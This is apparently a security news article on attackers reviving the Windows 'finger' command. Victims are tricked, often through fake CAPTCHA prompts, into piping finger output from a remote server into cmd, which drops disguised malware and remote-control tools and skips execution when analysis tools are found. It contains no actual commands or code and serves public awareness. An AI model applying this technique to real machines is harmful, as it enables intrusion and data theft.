Fast Facts

• The “finger” command, once used to look up user info on networks, is being exploited in new Windows cyberattacks.
• Attackers use finger to secretly download and launch malicious tools, bypassing many security systems.
• Victims are tricked into running commands, often masked by fake CAPTCHAs or verification requests.
• Recent attacks include data theft attempts and remote control software installation.
• Security experts warn that overlooked legacy features can become dangerous backdoors.

The Resurrection of a Digital Fossil

Picture a dusty, long-abandoned railway switch. Most would assume it’s harmless, forgotten, and safe to ignore. But what if someone figured out it still controls a hidden track? That’s the story of the “finger” command - a relic from the dawn of the internet - now being reanimated by hackers to quietly hijack modern Windows machines.

“Finger” was once a helpful tool for network administrators, designed to fetch basic details about users on Unix and, later, Windows systems: who was logged in, where their home directory was, and so on. But as the internet matured, finger gathered cobwebs, fading into near-obsolescence. Most people forgot it even existed. Cybercriminals, however, see opportunity in obscurity.

How Hackers Tap Into the Past

Recent investigations, including detailed findings by the MalwareHunterTeam and reports on Reddit, reveal a crafty new infection scheme. Attackers lure victims - sometimes with fake CAPTCHA popups or “identity verification” requests - into running seemingly harmless commands via the Windows command prompt. Unbeknownst to the user, these commands use finger to reach out to a remote server and fetch further instructions.

What happens next is a digital sleight of hand. The finger command’s output is piped directly into Windows’ command interpreter (cmd), launching a cascade of actions: temporary folders are created, legitimate system tools like curl are copied and renamed, and disguised malware - sometimes in the form of a fake PDF - slides onto the computer. In some cases, Python scripts are unpacked and executed without the user noticing, initiating data theft or opening a remote control channel for attackers.

To evade detection, these scripts even check for the presence of anti-malware tools like Process Explorer or Wireshark. If the coast is clear, the script presses on; if not, it quietly aborts, leaving few traces.

Why Old Tricks Work

The genius of this attack lies in its use of a channel that most security systems and IT staff have stopped watching. Since finger traffic is rare and often ignored, it’s the digital equivalent of a burglar using a forgotten service entrance. This isn’t the first time attackers have weaponized legacy tools - similar tactics have been seen with old protocols like Telnet or NetBIOS, but finger’s revival is especially sneaky due to its near-invisibility.

While the specific malicious servers uncovered by researchers have been taken down, the method is spreading. It’s a stark reminder that in cybersecurity, nothing ever truly disappears - and that the past, left unguarded, can become the future’s greatest weakness.

WIKICROOK

• Finger command: The Finger command is an old network tool for looking up basic user details, like login status, on local or remote systems.
• Command prompt (cmd): The command prompt (cmd) is a Windows tool that lets users control their computer by typing commands instead of using a mouse or menus.
• Remote code execution: Remote code execution lets attackers run commands on your computer from a distance, often leading to full system compromise and data theft.
• CAPTCHA: A CAPTCHA is a security test on websites that helps tell humans from bots, often by asking users to solve simple puzzles or identify images.
• NetSupport Manager: NetSupport Manager is a remote control software for IT support, but can also be exploited by hackers to access computers without permission.